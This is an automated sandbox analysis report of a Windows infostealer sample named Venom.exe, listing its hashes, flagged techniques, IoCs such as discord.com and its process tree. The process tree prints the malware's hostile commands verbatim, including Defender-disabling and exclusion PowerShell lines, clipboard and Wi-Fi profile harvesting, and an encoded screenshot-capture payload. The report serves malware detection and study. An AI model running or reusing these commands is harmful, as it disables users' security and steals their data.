Analysis
-
max time kernel
94s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2024 18:04
Behavioral task
behavioral1
Sample
Venom.exe
Resource
win10v2004-20241007-en
General
-
Target
Venom.exe
-
Size
7.5MB
-
MD5
5e9db4f5401cb38f434fbce2ab2f03f3
-
SHA1
7f55dd93461d1aa423c280a24f28b136d7b40941
-
SHA256
43b40024e938294ba67eb053973f01a1e6c3b0d9365c5fa7da54e89e74824414
-
SHA512
20420561b4789fb2fa852347cec718ebe65c8f82e0c8538e9cbc05d1d41d7d2c4ad16fa1572aa6af14d9e4c7e3146e49dc1bdfadd81be69b644233ff75b53a4f
-
SSDEEP
196608:vBunqZ6wfI9jUC2XMvH8zPjweaBpZ0cX2ooccXK7oST:kuIH2XgHq+jq93YoS
Malware Config
Signatures
-
pid Process 2576 powershell.exe 760 powershell.exe 4456 powershell.exe 212 powershell.exe 2064 powershell.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4348 cmd.exe 3632 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1588 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe 3640 Venom.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 27 discord.com 28 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 1636 tasklist.exe 4580 tasklist.exe 3856 tasklist.exe 5004 tasklist.exe -
resource yara_rule behavioral1/files/0x0007000000023cbb-21.dat upx behavioral1/memory/3640-25-0x00007FFE72160000-0x00007FFE72822000-memory.dmp upx behavioral1/files/0x0007000000023cb9-29.dat upx behavioral1/memory/3640-48-0x00007FFE8AF80000-0x00007FFE8AF8F000-memory.dmp upx behavioral1/memory/3640-30-0x00007FFE81930000-0x00007FFE81955000-memory.dmp upx behavioral1/files/0x0007000000023cae-28.dat upx behavioral1/files/0x0007000000023cb5-47.dat upx behavioral1/files/0x0007000000023cb4-46.dat upx behavioral1/files/0x0007000000023cb3-45.dat upx behavioral1/files/0x0007000000023cb2-44.dat upx behavioral1/files/0x0007000000023cb1-43.dat upx behavioral1/files/0x0007000000023cb0-42.dat upx behavioral1/files/0x0007000000023caf-41.dat upx behavioral1/files/0x0007000000023cad-40.dat upx behavioral1/files/0x0007000000023cbf-57.dat upx behavioral1/memory/3640-60-0x00007FFE817B0000-0x00007FFE817D4000-memory.dmp upx behavioral1/memory/3640-59-0x00007FFE80C60000-0x00007FFE80DDF000-memory.dmp upx behavioral1/memory/3640-58-0x00007FFE86560000-0x00007FFE86579000-memory.dmp upx behavioral1/memory/3640-55-0x00007FFE81900000-0x00007FFE8192C000-memory.dmp upx behavioral1/files/0x0007000000023cc0-39.dat upx behavioral1/files/0x0007000000023cbe-37.dat upx behavioral1/files/0x0007000000023cba-34.dat upx behavioral1/files/0x0007000000023cb8-33.dat upx behavioral1/memory/3640-64-0x00007FFE818F0000-0x00007FFE818FD000-memory.dmp upx behavioral1/memory/3640-63-0x00007FFE85AF0000-0x00007FFE85B09000-memory.dmp upx behavioral1/memory/3640-66-0x00007FFE81470000-0x00007FFE814A3000-memory.dmp upx behavioral1/memory/3640-68-0x00007FFE813A0000-0x00007FFE8146E000-memory.dmp upx behavioral1/memory/3640-71-0x00007FFE72160000-0x00007FFE72822000-memory.dmp upx behavioral1/memory/3640-72-0x00007FFE71A60000-0x00007FFE71F93000-memory.dmp upx behavioral1/memory/3640-80-0x00007FFE81380000-0x00007FFE81394000-memory.dmp upx behavioral1/memory/3640-79-0x00007FFE81930000-0x00007FFE81955000-memory.dmp upx behavioral1/memory/3640-78-0x00007FFE71520000-0x00007FFE7163A000-memory.dmp upx behavioral1/memory/3640-77-0x00007FFE817A0000-0x00007FFE817AD000-memory.dmp upx behavioral1/memory/3640-94-0x00007FFE80C60000-0x00007FFE80DDF000-memory.dmp upx behavioral1/memory/3640-110-0x00007FFE817B0000-0x00007FFE817D4000-memory.dmp upx behavioral1/memory/3640-297-0x00007FFE81470000-0x00007FFE814A3000-memory.dmp upx behavioral1/memory/3640-299-0x00007FFE813A0000-0x00007FFE8146E000-memory.dmp upx behavioral1/memory/3640-314-0x00007FFE71520000-0x00007FFE7163A000-memory.dmp upx behavioral1/memory/3640-313-0x00007FFE71A60000-0x00007FFE71F93000-memory.dmp upx behavioral1/memory/3640-331-0x00007FFE81930000-0x00007FFE81955000-memory.dmp upx behavioral1/memory/3640-330-0x00007FFE72160000-0x00007FFE72822000-memory.dmp upx behavioral1/memory/3640-336-0x00007FFE80C60000-0x00007FFE80DDF000-memory.dmp upx behavioral1/memory/3640-369-0x00007FFE71520000-0x00007FFE7163A000-memory.dmp upx behavioral1/memory/3640-368-0x00007FFE817A0000-0x00007FFE817AD000-memory.dmp upx behavioral1/memory/3640-367-0x00007FFE81380000-0x00007FFE81394000-memory.dmp upx behavioral1/memory/3640-366-0x00007FFE71A60000-0x00007FFE71F93000-memory.dmp upx behavioral1/memory/3640-365-0x00007FFE813A0000-0x00007FFE8146E000-memory.dmp upx behavioral1/memory/3640-364-0x00007FFE81470000-0x00007FFE814A3000-memory.dmp upx behavioral1/memory/3640-363-0x00007FFE818F0000-0x00007FFE818FD000-memory.dmp upx behavioral1/memory/3640-362-0x00007FFE85AF0000-0x00007FFE85B09000-memory.dmp upx behavioral1/memory/3640-361-0x00007FFE80C60000-0x00007FFE80DDF000-memory.dmp upx behavioral1/memory/3640-360-0x00007FFE817B0000-0x00007FFE817D4000-memory.dmp upx behavioral1/memory/3640-359-0x00007FFE86560000-0x00007FFE86579000-memory.dmp upx behavioral1/memory/3640-358-0x00007FFE81900000-0x00007FFE8192C000-memory.dmp upx behavioral1/memory/3640-357-0x00007FFE8AF80000-0x00007FFE8AF8F000-memory.dmp upx behavioral1/memory/3640-356-0x00007FFE81930000-0x00007FFE81955000-memory.dmp upx behavioral1/memory/3640-355-0x00007FFE72160000-0x00007FFE72822000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4104 cmd.exe 3312 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 684 WMIC.exe 4728 WMIC.exe 4456 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4228 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 212 powershell.exe 212 powershell.exe 760 powershell.exe 760 powershell.exe 2064 powershell.exe 2064 powershell.exe 3632 powershell.exe 3632 powershell.exe 1356 powershell.exe 1356 powershell.exe 3632 powershell.exe 1356 powershell.exe 4456 powershell.exe 4456 powershell.exe 1156 powershell.exe 1156 powershell.exe 2576 powershell.exe 2576 powershell.exe 1480 powershell.exe 1480 powershell.exe 1480 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 212 powershell.exe Token: SeDebugPrivilege 5004 tasklist.exe Token: SeIncreaseQuotaPrivilege 368 WMIC.exe Token: SeSecurityPrivilege 368 WMIC.exe Token: SeTakeOwnershipPrivilege 368 WMIC.exe Token: SeLoadDriverPrivilege 368 WMIC.exe Token: SeSystemProfilePrivilege 368 WMIC.exe Token: SeSystemtimePrivilege 368 WMIC.exe Token: SeProfSingleProcessPrivilege 368 WMIC.exe Token: SeIncBasePriorityPrivilege 368 WMIC.exe Token: SeCreatePagefilePrivilege 368 WMIC.exe Token: SeBackupPrivilege 368 WMIC.exe Token: SeRestorePrivilege 368 WMIC.exe Token: SeShutdownPrivilege 368 WMIC.exe Token: SeDebugPrivilege 368 WMIC.exe Token: SeSystemEnvironmentPrivilege 368 WMIC.exe Token: SeRemoteShutdownPrivilege 368 WMIC.exe Token: SeUndockPrivilege 368 WMIC.exe Token: SeManageVolumePrivilege 368 WMIC.exe Token: 33 368 WMIC.exe Token: 34 368 WMIC.exe Token: 35 368 WMIC.exe Token: 36 368 WMIC.exe Token: SeDebugPrivilege 760 powershell.exe Token: SeIncreaseQuotaPrivilege 368 WMIC.exe Token: SeSecurityPrivilege 368 WMIC.exe Token: SeTakeOwnershipPrivilege 368 WMIC.exe Token: SeLoadDriverPrivilege 368 WMIC.exe Token: SeSystemProfilePrivilege 368 WMIC.exe Token: SeSystemtimePrivilege 368 WMIC.exe Token: SeProfSingleProcessPrivilege 368 WMIC.exe Token: SeIncBasePriorityPrivilege 368 WMIC.exe Token: SeCreatePagefilePrivilege 368 WMIC.exe Token: SeBackupPrivilege 368 WMIC.exe Token: SeRestorePrivilege 368 WMIC.exe Token: SeShutdownPrivilege 368 WMIC.exe Token: SeDebugPrivilege 368 WMIC.exe Token: SeSystemEnvironmentPrivilege 368 WMIC.exe Token: SeRemoteShutdownPrivilege 368 WMIC.exe Token: SeUndockPrivilege 368 WMIC.exe Token: SeManageVolumePrivilege 368 WMIC.exe Token: 33 368 WMIC.exe Token: 34 368 WMIC.exe Token: 35 368 WMIC.exe Token: 36 368 WMIC.exe Token: SeIncreaseQuotaPrivilege 684 WMIC.exe Token: SeSecurityPrivilege 684 WMIC.exe Token: SeTakeOwnershipPrivilege 684 WMIC.exe Token: SeLoadDriverPrivilege 684 WMIC.exe Token: SeSystemProfilePrivilege 684 WMIC.exe Token: SeSystemtimePrivilege 684 WMIC.exe Token: SeProfSingleProcessPrivilege 684 WMIC.exe Token: SeIncBasePriorityPrivilege 684 WMIC.exe Token: SeCreatePagefilePrivilege 684 WMIC.exe Token: SeBackupPrivilege 684 WMIC.exe Token: SeRestorePrivilege 684 WMIC.exe Token: SeShutdownPrivilege 684 WMIC.exe Token: SeDebugPrivilege 684 WMIC.exe Token: SeSystemEnvironmentPrivilege 684 WMIC.exe Token: SeRemoteShutdownPrivilege 684 WMIC.exe Token: SeUndockPrivilege 684 WMIC.exe Token: SeManageVolumePrivilege 684 WMIC.exe Token: 33 684 WMIC.exe Token: 34 684 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 840 wrote to memory of 3640 840 Venom.exe 83 PID 840 wrote to memory of 3640 840 Venom.exe 83 PID 3640 wrote to memory of 3852 3640 Venom.exe 85 PID 3640 wrote to memory of 3852 3640 Venom.exe 85 PID 3640 wrote to memory of 1624 3640 Venom.exe 86 PID 3640 wrote to memory of 1624 3640 Venom.exe 86 PID 3640 wrote to memory of 3940 3640 Venom.exe 90 PID 3640 wrote to memory of 3940 3640 Venom.exe 90 PID 3640 wrote to memory of 2384 3640 Venom.exe 92 PID 3640 wrote to memory of 2384 3640 Venom.exe 92 PID 3852 wrote to memory of 212 3852 cmd.exe 95 PID 3852 wrote to memory of 212 3852 cmd.exe 95 PID 3940 wrote to memory of 5004 3940 cmd.exe 96 PID 3940 wrote to memory of 5004 3940 cmd.exe 96 PID 2384 wrote to memory of 368 2384 cmd.exe 97 PID 2384 wrote to memory of 368 2384 cmd.exe 97 PID 1624 wrote to memory of 760 1624 cmd.exe 98 PID 1624 wrote to memory of 760 1624 cmd.exe 98 PID 3640 wrote to memory of 1312 3640 Venom.exe 100 PID 3640 wrote to memory of 1312 3640 Venom.exe 100 PID 1312 wrote to memory of 4720 1312 cmd.exe 102 PID 1312 wrote to memory of 4720 1312 cmd.exe 102 PID 3640 wrote to memory of 1884 3640 Venom.exe 161 PID 3640 wrote to memory of 1884 3640 Venom.exe 161 PID 1884 wrote to memory of 632 1884 cmd.exe 105 PID 1884 wrote to memory of 632 1884 cmd.exe 105 PID 3640 wrote to memory of 1044 3640 Venom.exe 106 PID 3640 wrote to memory of 1044 3640 Venom.exe 106 PID 1044 wrote to memory of 684 1044 cmd.exe 108 PID 1044 wrote to memory of 684 1044 cmd.exe 108 PID 3640 wrote to memory of 1296 3640 Venom.exe 109 PID 3640 wrote to memory of 1296 3640 Venom.exe 109 PID 1296 wrote to memory of 4728 1296 cmd.exe 112 PID 1296 wrote to memory of 4728 1296 cmd.exe 112 PID 3640 wrote to memory of 4008 3640 Venom.exe 113 PID 3640 wrote to memory of 4008 3640 Venom.exe 113 PID 4008 wrote to memory of 2064 4008 cmd.exe 115 PID 4008 wrote to memory of 2064 4008 cmd.exe 115 PID 3640 wrote to memory of 3676 3640 Venom.exe 116 PID 3640 wrote to memory of 3676 3640 Venom.exe 116 PID 3640 wrote to memory of 3756 3640 Venom.exe 117 PID 3640 wrote to memory of 3756 3640 Venom.exe 117 PID 3640 wrote to memory of 1052 3640 Venom.exe 120 PID 3640 wrote to memory of 1052 3640 Venom.exe 120 PID 3640 wrote to memory of 4348 3640 Venom.exe 121 PID 3640 wrote to memory of 4348 3640 Venom.exe 121 PID 3640 wrote to memory of 3648 3640 Venom.exe 124 PID 3640 wrote to memory of 3648 3640 Venom.exe 124 PID 3676 wrote to memory of 1636 3676 cmd.exe 125 PID 3676 wrote to memory of 1636 3676 cmd.exe 125 PID 3640 wrote to memory of 2348 3640 Venom.exe 126 PID 3640 wrote to memory of 2348 3640 Venom.exe 126 PID 3756 wrote to memory of 4580 3756 cmd.exe 128 PID 3756 wrote to memory of 4580 3756 cmd.exe 128 PID 3640 wrote to memory of 4104 3640 Venom.exe 130 PID 3640 wrote to memory of 4104 3640 Venom.exe 130 PID 1052 wrote to memory of 4100 1052 cmd.exe 131 PID 1052 wrote to memory of 4100 1052 cmd.exe 131 PID 3640 wrote to memory of 3464 3640 Venom.exe 133 PID 3640 wrote to memory of 3464 3640 Venom.exe 133 PID 3640 wrote to memory of 4020 3640 Venom.exe 134 PID 3640 wrote to memory of 4020 3640 Venom.exe 134 PID 4348 wrote to memory of 3632 4348 cmd.exe 137 PID 4348 wrote to memory of 3632 4348 cmd.exe 137
Processes
-
C:\Users\Admin\AppData\Local\Temp\Venom.exe"C:\Users\Admin\AppData\Local\Temp\Venom.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Users\Admin\AppData\Local\Temp\Venom.exe"C:\Users\Admin\AppData\Local\Temp\Venom.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3640 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Venom.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Venom.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:4720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:684
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:1636
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4580
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:4100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3648
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2348
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:1532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4104 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:3312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:3464
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:4020
-
